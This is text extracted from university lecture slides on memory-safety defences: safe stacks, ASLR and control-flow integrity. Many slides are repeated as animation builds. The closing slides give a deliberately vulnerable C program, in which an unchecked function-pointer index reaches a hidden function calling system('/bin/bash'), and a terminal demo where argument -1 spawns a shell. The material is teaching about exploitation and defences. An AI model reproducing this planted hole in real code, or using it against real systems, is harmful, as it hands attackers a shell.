![Page 328: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/328.jpg)
An alternative: Safe Stack www.tugraz.at
• Simple idea: two different stacks, a safe stack and an unsafe
stack
• Simple variables and return values on the safe stack
• Buffers on the unsafe stack
• Buffer overflows cannot overwrite the return address anymore
75 Michael Schwarz — www.iaik.tugraz.at
![Page 329: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/329.jpg)
An alternative: Safe Stack www.tugraz.at
• Simple idea: two different stacks, a safe stack and an unsafe
stack
• Simple variables and return values on the safe stack
• Buffers on the unsafe stack
• Buffer overflows cannot overwrite the return address anymore
75 Michael Schwarz — www.iaik.tugraz.at
![Page 330: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/330.jpg)
Safe Stack www.tugraz.at
Safe Stack
0x7FF... saved return addresssaved base pointer
)
last frame)
Unsafe Stack
0x7FF... local variables u last frame
0x000...
)
Normal Stack
0x7FF... saved return addresssaved base pointer
local variables
+
last frame
0x000...
,
/
.
/
-
76 Michael Schwarz — www.iaik.tugraz.at
![Page 331: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/331.jpg)
Safe Stack www.tugraz.at
Safe Stack
0x7FF... saved return addresssaved base pointer
)
last frame
saved return address)
current frame
Unsafe Stack
0x7FF... local variables u last frame
0x000...
)
current frame
Normal Stack
0x7FF... saved return addresssaved base pointer
local variables
+
last frame
saved return address
0x000...
,
/
.
/
-
current frame
76 Michael Schwarz — www.iaik.tugraz.at
![Page 332: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/332.jpg)
Safe Stack www.tugraz.at
Safe Stack
0x7FF... saved return addresssaved base pointer
)
last frame
saved return addresssaved base pointer
)
current frame
Unsafe Stack
0x7FF... local variables u last frame
0x000...
)
current frame
Normal Stack
0x7FF... saved return addresssaved base pointer
local variables
+
last frame
saved return addresssaved base pointer
0x000...
,
/
.
/
-
current frame
76 Michael Schwarz — www.iaik.tugraz.at
![Page 333: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/333.jpg)
Safe Stack www.tugraz.at
Safe Stack
0x7FF... saved return addresssaved base pointer
)
last frame
saved return addresssaved base pointer
)
current frame
Unsafe Stack
0x7FF... local variables u last framelocal variables
0x000... ...
)
current frame
Normal Stack
0x7FF... saved return addresssaved base pointer
local variables
+
last frame
saved return addresssaved base pointer
local variables0x000... ...
,
/
.
/
-
current frame
76 Michael Schwarz — www.iaik.tugraz.at
![Page 334: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/334.jpg)
Trigger the Bug with Safe Stack www.tugraz.at
• clang supports safe stacks with a compile flag (not yet implemented in gcc)
% clang pwdman.c -fsanitize=safe-stack -o pwdman
% ./pwdman
Enter PIN:
1234
Wrong PIN!
Enter PIN:
0123456789012345678901234567890123456789
Wrong PIN!
Enter PIN:
77 Michael Schwarz — www.iaik.tugraz.at
![Page 335: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/335.jpg)
Trigger the Bug with Safe Stack www.tugraz.at
• clang supports safe stacks with a compile flag (not yet implemented in gcc)
% clang pwdman.c -fsanitize=safe-stack -o pwdman
% ./pwdman
Enter PIN:
1234
Wrong PIN!
Enter PIN:
0123456789012345678901234567890123456789
Wrong PIN!
Enter PIN:
77 Michael Schwarz — www.iaik.tugraz.at
![Page 336: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/336.jpg)
Trigger the Bug with Safe Stack www.tugraz.at
• clang supports safe stacks with a compile flag (not yet implemented in gcc)
% clang pwdman.c -fsanitize=safe-stack -o pwdman
% ./pwdman
Enter PIN:
1234
Wrong PIN!
Enter PIN:
0123456789012345678901234567890123456789
Wrong PIN!
Enter PIN:
77 Michael Schwarz — www.iaik.tugraz.at
![Page 337: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/337.jpg)
Trigger the Bug with Safe Stack www.tugraz.at
• clang supports safe stacks with a compile flag (not yet implemented in gcc)
% clang pwdman.c -fsanitize=safe-stack -o pwdman
% ./pwdman
Enter PIN:
1234
Wrong PIN!
Enter PIN:
0123456789012345678901234567890123456789
Wrong PIN!
Enter PIN:
77 Michael Schwarz — www.iaik.tugraz.at
![Page 338: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/338.jpg)
Think bigger! www.tugraz.at
• Until now, we only prevented a small class of bugs
• It looks like a cat-and-mouse game
• It works and adds protection, but we have to combine a lot of
countermeasures if we continue that way
• Every countermeasures costs (performance, memory, ...)
• We want something more generic, even if it is not as powerful
as specific countermeasures
78 Michael Schwarz — www.iaik.tugraz.at
![Page 339: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/339.jpg)
Think bigger! www.tugraz.at
• Until now, we only prevented a small class of bugs
• It looks like a cat-and-mouse game
• It works and adds protection, but we have to combine a lot of
countermeasures if we continue that way
• Every countermeasures costs (performance, memory, ...)
• We want something more generic, even if it is not as powerful
as specific countermeasures
78 Michael Schwarz — www.iaik.tugraz.at
![Page 340: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/340.jpg)
Think bigger! www.tugraz.at
• Until now, we only prevented a small class of bugs
• It looks like a cat-and-mouse game
• It works and adds protection, but we have to combine a lot of
countermeasures if we continue that way
• Every countermeasures costs (performance, memory, ...)
• We want something more generic, even if it is not as powerful
as specific countermeasures
78 Michael Schwarz — www.iaik.tugraz.at
![Page 341: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/341.jpg)
Think bigger! www.tugraz.at
• Until now, we only prevented a small class of bugs
• It looks like a cat-and-mouse game
• It works and adds protection, but we have to combine a lot of
countermeasures if we continue that way
• Every countermeasures costs (performance, memory, ...)
• We want something more generic, even if it is not as powerful
as specific countermeasures
78 Michael Schwarz — www.iaik.tugraz.at
![Page 342: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/342.jpg)
Think bigger! www.tugraz.at
• Until now, we only prevented a small class of bugs
• It looks like a cat-and-mouse game
• It works and adds protection, but we have to combine a lot of
countermeasures if we continue that way
• Every countermeasures costs (performance, memory, ...)
• We want something more generic, even if it is not as powerful
as specific countermeasures
78 Michael Schwarz — www.iaik.tugraz.at
![Page 343: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/343.jpg)
It’s all about randomness www.tugraz.at
• Randomness is often used in security Ñ probabilistic approach
• Assumption: attacker can jump to any memory location
• What if all memory locations are unpredictable?
• Attacker cannot reliably jump to a specific location anymore
79 Michael Schwarz — www.iaik.tugraz.at
![Page 344: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/344.jpg)
It’s all about randomness www.tugraz.at
• Randomness is often used in security Ñ probabilistic approach
• Assumption: attacker can jump to any memory location
• What if all memory locations are unpredictable?
• Attacker cannot reliably jump to a specific location anymore
79 Michael Schwarz — www.iaik.tugraz.at
![Page 345: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/345.jpg)
It’s all about randomness www.tugraz.at
• Randomness is often used in security Ñ probabilistic approach
• Assumption: attacker can jump to any memory location
• What if all memory locations are unpredictable?
• Attacker cannot reliably jump to a specific location anymore
79 Michael Schwarz — www.iaik.tugraz.at
![Page 346: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/346.jpg)
It’s all about randomness www.tugraz.at
• Randomness is often used in security Ñ probabilistic approach
• Assumption: attacker can jump to any memory location
• What if all memory locations are unpredictable?
• Attacker cannot reliably jump to a specific location anymore
79 Michael Schwarz — www.iaik.tugraz.at
![Page 347: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/347.jpg)
Address Space Layout Randomization (ASLR) www.tugraz.at
• Address Space Layout Randomization (ASLR) randomizes the
position of program parts
code
data
bss
heap
shared
mem
ory
shared
libraries
stack
0 247
• Attacker cannot predict the location of a sane or injected state
• Powerful on 64-bit systems Ñ huge address space (128 TB)
80 Michael Schwarz — www.iaik.tugraz.at
![Page 348: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/348.jpg)
Address Space Layout Randomization (ASLR) www.tugraz.at
• Address Space Layout Randomization (ASLR) randomizes the
position of program parts
code
data
bss
heap
shared
mem
ory
shared
libraries
stack
0 247
• Attacker cannot predict the location of a sane or injected state
• Powerful on 64-bit systems Ñ huge address space (128 TB)
80 Michael Schwarz — www.iaik.tugraz.at
![Page 349: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/349.jpg)
Address Space Layout Randomization (ASLR) www.tugraz.at
• Address Space Layout Randomization (ASLR) randomizes the
position of program parts
code
data
bss
heap
shared
mem
ory
shared
libraries
stack
0 247
• Attacker cannot predict the location of a sane or injected state
• Powerful on 64-bit systems Ñ huge address space (128 TB)
80 Michael Schwarz — www.iaik.tugraz.at
![Page 350: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/350.jpg)
Address Space Layout Randomization (ASLR) www.tugraz.at
• Address Space Layout Randomization (ASLR) randomizes the
position of program parts
code
data
bss
heap
shared
mem
ory
shared
libraries
stack
0 247
• Attacker cannot predict the location of a sane or injected state
• Powerful on 64-bit systems Ñ huge address space (128 TB)
80 Michael Schwarz — www.iaik.tugraz.at
![Page 351: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/351.jpg)
Address Space Layout Randomization (ASLR) www.tugraz.at
• Address Space Layout Randomization (ASLR) randomizes the
position of program parts
code
data
bss
heap
shared
mem
ory
shared
libraries
stack
0 247
• Attacker cannot predict the location of a sane or injected state
• Powerful on 64-bit systems Ñ huge address space (128 TB)
80 Michael Schwarz — www.iaik.tugraz.at
![Page 352: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/352.jpg)
ASLR and its benefits www.tugraz.at
• ASLR is only a probabilistic countermeasure relying on twoassumptions
• No leak of addresses Ñ breaks ASLR immediately
• Randomization range is large enough Ñ brute force breaks ASLR
• On 64-bit systems, ASLR makes exploitation really hard
• Advantage of ASLR: it costs nearly nothing Ñ widespread use
81 Michael Schwarz — www.iaik.tugraz.at
![Page 353: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/353.jpg)
ASLR and its benefits www.tugraz.at
• ASLR is only a probabilistic countermeasure relying on twoassumptions
• No leak of addresses Ñ breaks ASLR immediately
• Randomization range is large enough Ñ brute force breaks ASLR
• On 64-bit systems, ASLR makes exploitation really hard
• Advantage of ASLR: it costs nearly nothing Ñ widespread use
81 Michael Schwarz — www.iaik.tugraz.at
![Page 354: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/354.jpg)
ASLR and its benefits www.tugraz.at
• ASLR is only a probabilistic countermeasure relying on twoassumptions
• No leak of addresses Ñ breaks ASLR immediately
• Randomization range is large enough Ñ brute force breaks ASLR
• On 64-bit systems, ASLR makes exploitation really hard
• Advantage of ASLR: it costs nearly nothing Ñ widespread use
81 Michael Schwarz — www.iaik.tugraz.at
![Page 355: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/355.jpg)
ASLR and its benefits www.tugraz.at
• ASLR is only a probabilistic countermeasure relying on twoassumptions
• No leak of addresses Ñ breaks ASLR immediately
• Randomization range is large enough Ñ brute force breaks ASLR
• On 64-bit systems, ASLR makes exploitation really hard
• Advantage of ASLR: it costs nearly nothing Ñ widespread use
81 Michael Schwarz — www.iaik.tugraz.at
![Page 356: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/356.jpg)
ASLR and its benefits www.tugraz.at
• ASLR is only a probabilistic countermeasure relying on twoassumptions
• No leak of addresses Ñ breaks ASLR immediately
• Randomization range is large enough Ñ brute force breaks ASLR
• On 64-bit systems, ASLR makes exploitation really hard
• Advantage of ASLR: it costs nearly nothing Ñ widespread use
81 Michael Schwarz — www.iaik.tugraz.at
![Page 357: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/357.jpg)
ASLR in the real world www.tugraz.at
• As ASLR is a cheap but nevertheless effective countermeasure,it is widely used
• Linux since 2005 (since 2014 in the kernel)
• Windows since 2007
• Android and iOS since 2011
• Mac OS since 2011 (since 2012 in the kernel)
• Prevented many single bug exploits, as they fail with a high
probability
82 Michael Schwarz — www.iaik.tugraz.at
![Page 358: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/358.jpg)
ASLR in the real world www.tugraz.at
• As ASLR is a cheap but nevertheless effective countermeasure,it is widely used
• Linux since 2005 (since 2014 in the kernel)
• Windows since 2007
• Android and iOS since 2011
• Mac OS since 2011 (since 2012 in the kernel)
• Prevented many single bug exploits, as they fail with a high
probability
82 Michael Schwarz — www.iaik.tugraz.at
![Page 359: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/359.jpg)
ASLR in the real world www.tugraz.at
• As ASLR is a cheap but nevertheless effective countermeasure,it is widely used
• Linux since 2005 (since 2014 in the kernel)
• Windows since 2007
• Android and iOS since 2011
• Mac OS since 2011 (since 2012 in the kernel)
• Prevented many single bug exploits, as they fail with a high
probability
82 Michael Schwarz — www.iaik.tugraz.at
![Page 360: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/360.jpg)
Preventing the Programming step www.tugraz.at
• Assumption: attacker still found a way to get into a weird state
• Last ressort to prevent exploitation Ñ make the Programming
step infeasible
• Attacker uses the input stream to program the weird machine
• We could filter the input stream – but this is not always possible
83 Michael Schwarz — www.iaik.tugraz.at
![Page 361: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/361.jpg)
Preventing the Programming step www.tugraz.at
• Assumption: attacker still found a way to get into a weird state
• Last ressort to prevent exploitation Ñ make the Programming
step infeasible
• Attacker uses the input stream to program the weird machine
• We could filter the input stream – but this is not always possible
83 Michael Schwarz — www.iaik.tugraz.at
![Page 362: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/362.jpg)
Preventing the Programming step www.tugraz.at
• Assumption: attacker still found a way to get into a weird state
• Last ressort to prevent exploitation Ñ make the Programming
step infeasible
• Attacker uses the input stream to program the weird machine
• We could filter the input stream – but this is not always possible
83 Michael Schwarz — www.iaik.tugraz.at
![Page 363: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/363.jpg)
Preventing the Programming step www.tugraz.at
• Assumption: attacker still found a way to get into a weird state
• Last ressort to prevent exploitation Ñ make the Programming
step infeasible
• Attacker uses the input stream to program the weird machine
• We could filter the input stream – but this is not always possible
83 Michael Schwarz — www.iaik.tugraz.at
![Page 364: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/364.jpg)
Self awareness www.tugraz.at
• Idea: make the FSM aware of itself!
• The FSM should know which states and transitions are allowed
Ñ Prevent all transitions which are not in the original FSM
• Every state has to check whether
• target of an indirect jump is correct according to the FSM
• saved return address points to a previous state
• Forces the program to stay inside the FSM
84 Michael Schwarz — www.iaik.tugraz.at
![Page 365: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/365.jpg)
Self awareness www.tugraz.at
• Idea: make the FSM aware of itself!
• The FSM should know which states and transitions are allowed
Ñ Prevent all transitions which are not in the original FSM
• Every state has to check whether
• target of an indirect jump is correct according to the FSM
• saved return address points to a previous state
• Forces the program to stay inside the FSM
84 Michael Schwarz — www.iaik.tugraz.at
![Page 366: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/366.jpg)
Self awareness www.tugraz.at
• Idea: make the FSM aware of itself!
• The FSM should know which states and transitions are allowed
Ñ Prevent all transitions which are not in the original FSM
• Every state has to check whether
• target of an indirect jump is correct according to the FSM
• saved return address points to a previous state
• Forces the program to stay inside the FSM
84 Michael Schwarz — www.iaik.tugraz.at
![Page 367: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/367.jpg)
Self awareness www.tugraz.at
• Idea: make the FSM aware of itself!
• The FSM should know which states and transitions are allowed
Ñ Prevent all transitions which are not in the original FSM
• Every state has to check whether
• target of an indirect jump is correct according to the FSM
• saved return address points to a previous state
• Forces the program to stay inside the FSM
84 Michael Schwarz — www.iaik.tugraz.at
![Page 368: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/368.jpg)
Self awareness www.tugraz.at
• Idea: make the FSM aware of itself!
• The FSM should know which states and transitions are allowed
Ñ Prevent all transitions which are not in the original FSM
• Every state has to check whether
• target of an indirect jump is correct according to the FSM
• saved return address points to a previous state
• Forces the program to stay inside the FSM
84 Michael Schwarz — www.iaik.tugraz.at
![Page 369: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/369.jpg)
Self awareness www.tugraz.at
• Idea: make the FSM aware of itself!
• The FSM should know which states and transitions are allowed
Ñ Prevent all transitions which are not in the original FSM
• Every state has to check whether
• target of an indirect jump is correct according to the FSM
• saved return address points to a previous state
• Forces the program to stay inside the FSM
84 Michael Schwarz — www.iaik.tugraz.at
![Page 370: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/370.jpg)
Self awareness www.tugraz.at
• Idea: make the FSM aware of itself!
• The FSM should know which states and transitions are allowed
Ñ Prevent all transitions which are not in the original FSM
• Every state has to check whether
• target of an indirect jump is correct according to the FSM
• saved return address points to a previous state
• Forces the program to stay inside the FSM
84 Michael Schwarz — www.iaik.tugraz.at
![Page 371: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/371.jpg)
Allowed and Disallowed transitions www.tugraz.at
Read PIN
Show PIN
correct?
Show password list
Error message
33
3
Yes 3 3
No 3
3
3
7
7
7
7
3
85 Michael Schwarz — www.iaik.tugraz.at
![Page 372: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/372.jpg)
Control-flow integrity www.tugraz.at
• Control-flow integrity sounds simple Ñ difficult to implement
• Control-flow graph must be correctly constructed
• Function pointers cannot be protected if destination set is large
• Some functions (e.g., library functions) have many call locations
and therefore return locations
• Still, usable implementations in clang and from Microsoft
• Exploitation is still possible Ñ integrity checks are often
coarse-grained
86 Michael Schwarz — www.iaik.tugraz.at
![Page 373: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/373.jpg)
Control-flow integrity www.tugraz.at
• Control-flow integrity sounds simple Ñ difficult to implement
• Control-flow graph must be correctly constructed
• Function pointers cannot be protected if destination set is large
• Some functions (e.g., library functions) have many call locations
and therefore return locations
• Still, usable implementations in clang and from Microsoft
• Exploitation is still possible Ñ integrity checks are often
coarse-grained
86 Michael Schwarz — www.iaik.tugraz.at
![Page 374: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/374.jpg)
Control-flow integrity www.tugraz.at
• Control-flow integrity sounds simple Ñ difficult to implement
• Control-flow graph must be correctly constructed
• Function pointers cannot be protected if destination set is large
• Some functions (e.g., library functions) have many call locations
and therefore return locations
• Still, usable implementations in clang and from Microsoft
• Exploitation is still possible Ñ integrity checks are often
coarse-grained
86 Michael Schwarz — www.iaik.tugraz.at
![Page 375: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/375.jpg)
Control-flow integrity www.tugraz.at
• Control-flow integrity sounds simple Ñ difficult to implement
• Control-flow graph must be correctly constructed
• Function pointers cannot be protected if destination set is large
• Some functions (e.g., library functions) have many call locations
and therefore return locations
• Still, usable implementations in clang and from Microsoft
• Exploitation is still possible Ñ integrity checks are often
coarse-grained
86 Michael Schwarz — www.iaik.tugraz.at
![Page 376: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/376.jpg)
Control-flow integrity www.tugraz.at
• Control-flow integrity sounds simple Ñ difficult to implement
• Control-flow graph must be correctly constructed
• Function pointers cannot be protected if destination set is large
• Some functions (e.g., library functions) have many call locations
and therefore return locations
• Still, usable implementations in clang and from Microsoft
• Exploitation is still possible Ñ integrity checks are often
coarse-grained
86 Michael Schwarz — www.iaik.tugraz.at
![Page 377: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/377.jpg)
Control-flow integrity www.tugraz.at
• Control-flow integrity sounds simple Ñ difficult to implement
• Control-flow graph must be correctly constructed
• Function pointers cannot be protected if destination set is large
• Some functions (e.g., library functions) have many call locations
and therefore return locations
• Still, usable implementations in clang and from Microsoft
• Exploitation is still possible Ñ integrity checks are often
coarse-grained
86 Michael Schwarz — www.iaik.tugraz.at
![Page 378: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/378.jpg)
Control-flow integrity - Example www.tugraz.at
typedef void (*function)();
void help() {
printf("Display this help message\
n");
}
void unlock() {
unlockPasswordManager();
}
void quit() {
printf("Bye!\n");
exit(0);
}
void usage() {
printf("Usage: pwdman-ui <0-2>\n")
;
}
void debug() {
printf("Here is your shell\n");
system("/bin/bash");
}
int main(int argc, char* argv[]) {
function commands[] = {
help, unlock, quit
};
function debugging[] = {
debug
};
if(argc > 1) {
commands[atoi(argv[1])]();
} else usage();
}
87 Michael Schwarz — www.iaik.tugraz.at
![Page 379: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/379.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
![Page 380: System Security 1 - Memory Safety - Information Security€¦ · Memory safety is a concern in software development that aims to avoid software bugs that cause security vulnerabilities](https://reader034.vdocuments.us/reader034/viewer/2022043012/5fa899def35d384fa5750080/html5/thumbnails/380.jpg)
Control-flow integrity - Example www.tugraz.at
% clang pwdman-ui.c -o pwdman-ui
% ./pwdman-ui
Usage: pwdman-ui <0-2>
% ./pwdman-ui 0
Display this help message
% ./pwdman-ui 1
Enter PIN: ˆC
% ./pwdman-ui 2
Bye!
% ./pwdman-ui 10
[1] 20659 segmentation fault (core dumped) ./pwdman-ui 10
% ./pwdman-ui -1
Here is your shell
#
88 Michael Schwarz — www.iaik.tugraz.at
